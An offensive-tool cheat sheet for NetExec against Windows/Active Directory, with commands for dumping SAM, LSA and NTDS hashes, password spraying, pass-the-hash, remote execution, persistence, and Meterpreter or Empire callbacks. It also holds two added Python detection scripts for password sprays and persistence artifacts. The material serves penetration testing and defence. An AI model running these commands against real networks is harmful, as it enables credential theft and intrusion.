
🛠 NetExec (nxc) Cheat Sheet

NetExec (nxc) is a network attack tool for enumeration, credential harvesting, lateral movement, and post-exploitation in Windows/Active Directory environments.
Syntax:

nxc [runtime options] <protocol> <target> [options] [-M module] [-o module options]

✅ Installation

Kali Linux

apt update
apt install netexec

Python (pipx)

sudo apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec

GitHub (Poetry)

apt install pipx git
pipx install poetry
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
poetry install
poetry run NetExec

⚙ General Options

  • -h → Show help
  • -t THREADS → Number of threads
  • --timeout TIMEOUT → Timeout per thread
  • --jitter INTERVAL → Random delay

🌐 Supported Protocols

smb | winrm | ldap | wmi | mssql | ssh | rdp | ftp | vnc

🔍 Discovery & Enumeration

nxc <protocol> <target>                # Scan for service
nxc smb <target> -u USER -p PASS --users        # Domain users
nxc smb <target> -u USER -p PASS --groups       # Domain groups
nxc smb <target> -u USER -p PASS --computers    # Computers
nxc smb <target> -u USER -p PASS --shares       # Shares
nxc smb <target> -u USER -p PASS -M spider_plus # Dump shares
nxc smb <target> -u USER -p PASS --sessions     # Active sessions
nxc smb <target> -u USER -p PASS --wmi QUERY    # WMI query

🔑 Credential Harvesting & Brute Force

nxc smb <target> -u USER -p PASS --sam          # Dump SAM hashes
nxc smb <target> -u USER -p PASS --lsa          # Dump LSA secrets
nxc smb <target> -u USER -p PASS --ntds vss     # Dump NTDS.dit
nxc smb <target> -u USER -p PASS --dpapi cookies # DPAPI secrets
nxc <protocol> <target> -u USER -p PASS         # Password spray
nxc <protocol> <target> -u USER -H HASH         # Pass-the-Hash
KRB5CCNAME=<ticket.ccache> nxc <protocol> <target> --use-kcache   # Pass-the-Ticket (ticket read from the ccache file)
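The spray line above is what a defender sees as a burst of failed logons from one source against many distinct accounts. The following is an added detection example, not part of the StationX cheat sheet or of NetExec; it runs over constructed Windows 4625 (failed logon) records that have already been flattened to dicts (field names `time`, `user`, `src`, `status` are this example's own, chosen to mirror TimeCreated, TargetUserName, IpAddress and the NTSTATUS code) and flags any source that fails against at least `min_users` different accounts inside a sliding time window.

```python
"""Password-spray detection over flattened Windows 4625 events.

Added example for the cheat sheet; not code from NetExec or StationX.
Events are constructed. Status 0xC000006A is "wrong password" and
0xC0000064 is "no such user", the two codes a spray usually produces.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.50 tries one password against six accounts in
# six seconds (spray); 10.0.0.77 is one user mistyping a password three
# times; 10.0.0.99 is a slow spray spread over twenty minutes.
SAMPLE_4625 = [
    {"time": "2024-01-10T09:00:01", "user": "alice", "src": "10.0.0.50", "status": "0xC000006A"},
    {"time": "2024-01-10T09:00:02", "user": "bob",   "src": "10.0.0.50", "status": "0xC000006A"},
    {"time": "2024-01-10T09:00:03", "user": "carol", "src": "10.0.0.50", "status": "0xC000006A"},
    {"time": "2024-01-10T09:00:04", "user": "dave",  "src": "10.0.0.50", "status": "0xC0000064"},
    {"time": "2024-01-10T09:00:05", "user": "erin",  "src": "10.0.0.50", "status": "0xC000006A"},
    {"time": "2024-01-10T09:00:06", "user": "frank", "src": "10.0.0.50", "status": "0xC000006A"},
    {"time": "2024-01-10T09:01:00", "user": "grace", "src": "10.0.0.77", "status": "0xC000006A"},
    {"time": "2024-01-10T09:01:05", "user": "grace", "src": "10.0.0.77", "status": "0xC000006A"},
    {"time": "2024-01-10T09:01:10", "user": "grace", "src": "10.0.0.77", "status": "0xC000006A"},
    {"time": "2024-01-10T08:00:00", "user": "hank",  "src": "10.0.0.99", "status": "0xC000006A"},
    {"time": "2024-01-10T08:10:00", "user": "ivan",  "src": "10.0.0.99", "status": "0xC000006A"},
    {"time": "2024-01-10T08:20:00", "user": "judy",  "src": "10.0.0.99", "status": "0xC000006A"},
]


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source_ip: sorted distinct usernames} for every source whose
    failed logons touched at least `min_users` accounts within `window`.

    A deque per source holds the attempts inside the current window; the
    largest distinct-user set seen for a flagged source is reported.
    """
    by_src = defaultdict(list)
    for event in sorted(events, key=lambda e: e["time"]):
        by_src[event["src"]].append((datetime.fromisoformat(event["time"]), event["user"]))

    hits = {}
    for src, attempts in by_src.items():
        recent = deque()
        for when, user in attempts:
            recent.append((when, user))
            # Drop attempts that have fallen out of the window.
            while recent and when - recent[0][0] > window:
                recent.popleft()
            users = {u for _, u in recent}
            if len(users) >= min_users and len(users) > len(hits.get(src, ())):
                hits[src] = sorted(users)
    return hits


if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_4625).items():
        print(f"possible spray from {src}: {len(users)} accounts: {', '.join(users)}")
```

Tuning the window and threshold is the whole game: the default catches the fast spray at 10.0.0.50 and ignores the single mistyping user, while widening the window to an hour with a threshold of three also surfaces the slow source. Counting distinct target accounts rather than raw failures is what separates a spray from an ordinary lockout.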

🚀 Lateral Movement

nxc smb <target> -u USER -p PASS -x "COMMAND"   # Remote command
nxc smb <target> -u USER -p PASS -X "PS_COMMAND" # PowerShell
nxc smb <target> -u USER -p PASS --exec-method wmiexec -x "COMMAND"

🛡 Post-Exploitation

nxc smb <target> -u USER -p PASS -M rdp             # Enable RDP
nxc smb <target> -u USER -p PASS -M impersonate     # Token impersonation
nxc smb <target> -u USER -p PASS -M enum-avproducts # AV products
nxc smb <target> -u USER -p PASS --get-file REMOTE LOCAL
nxc smb <target> -u USER -p PASS --put-file LOCAL REMOTE

🔒 Persistence

nxc smb <target> -u USER -p PASS -x "schtasks /create ..."
nxc smb <target> -u USER -p PASS -x "reg add ..."
nxc smb <target> -u USER -p PASS --put-file <PAYLOAD> "%APPDATA%\Startup\<PAYLOAD>"
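The remote-command lines in the Lateral Movement section and the scheduled-task, registry and Startup-folder lines just above all leave host-side artifacts. The following is an added triage example, not part of the StationX cheat sheet or of NetExec; it runs four heuristics over constructed, already-flattened Windows events (System 7045 service install, Security 4698 scheduled task created, Sysmon 13 registry value set, Sysmon 11 file create) and labels the ones that match. The field names `image_path`, `task_command`, `target_object`, `target_filename` are this example's own flattening of those events, and the smbexec-style pattern (a cmd.exe service whose output is redirected to an ADMIN$ or C$ share on 127.0.0.1) is a heuristic, not a signature taken from the tool.

```python
"""Host-side triage of artifacts left by remote execution and persistence.

Added example for the cheat sheet; not code from NetExec or StationX.
All events below are constructed.
"""
import re

# Service binary that is a command shell writing its output back to a
# local admin share: the shape a smbexec-style remote command leaves.
SERVICE_EXEC_RE = re.compile(r"(cmd\.exe|%COMSPEC%).*\\\\127\.0\.0\.1\\(ADMIN|C)\$", re.IGNORECASE)
# Scheduled task whose action is a script host rather than a vendor binary.
SCRIPT_HOST_RE = re.compile(r"\b(cmd|powershell|pwsh)\.exe", re.IGNORECASE)
# Per-user or machine Run / RunOnce autorun keys.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Anything written into a Startup folder.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)

SAMPLE_EVENTS = [
    {"host": "WS01", "id": 7045, "image_path": r"%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\__output 2^>^&1"},
    {"host": "WS01", "id": 7045, "image_path": r"C:\Program Files\Vendor\agent.exe"},
    {"host": "WS02", "id": 4698, "task_command": r"C:\Windows\System32\cmd.exe /c C:\Users\Public\update.bat"},
    {"host": "WS02", "id": 4698, "task_command": r"C:\Program Files\Vendor\updater.exe"},
    {"host": "WS03", "id": 13, "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"host": "WS03", "id": 13, "target_object": r"HKLM\SOFTWARE\Vendor\Agent\LastRun"},
    {"host": "WS03", "id": 11, "target_filename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.exe"},
]


def classify(event):
    """Return a label for a suspicious event, or None for a benign one."""
    eid = event["id"]
    if eid == 7045 and SERVICE_EXEC_RE.search(event.get("image_path", "")):
        return "smbexec-style service install"
    if eid == 4698 and SCRIPT_HOST_RE.search(event.get("task_command", "")):
        return "scheduled task running a script host"
    if eid == 13 and RUN_KEY_RE.search(event.get("target_object", "")):
        return "autorun registry key modified"
    if eid == 11 and STARTUP_RE.search(event.get("target_filename", "")):
        return "file dropped in a Startup folder"
    return None


def triage(events):
    """Return (host, event_id, label) for every event that matches a rule."""
    findings = []
    for event in events:
        label = classify(event)
        if label:
            findings.append((event["host"], event["id"], label))
    return findings


if __name__ == "__main__":
    for host, eid, label in triage(SAMPLE_EVENTS):
        print(f"{host}: event {eid}: {label}")
```

These rules are deliberately narrow so that vendor services, updaters and ordinary registry writes pass through untouched; in production they would be joined to the logon (4624) that created the service or task so that a network logon from an unexpected source can be weighted higher than a console session.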

🧠 Advanced Features

nxc ldap <target> -u USER -p PASS --bloodhound --collection All
nxc ldap <target> -u USER -p PASS -M teams_localdb
nxc rdp <target> -u USER -p PASS --screenshot
nxc smb <target> -u USER -p PASS -M empire_exec -o LISTENER=<listener>
nxc smb <target> -u USER -p PASS -M met_inject -o LHOST=<IP> LPORT=<PORT>

🔗 Source: StationX NetExec Cheat Sheet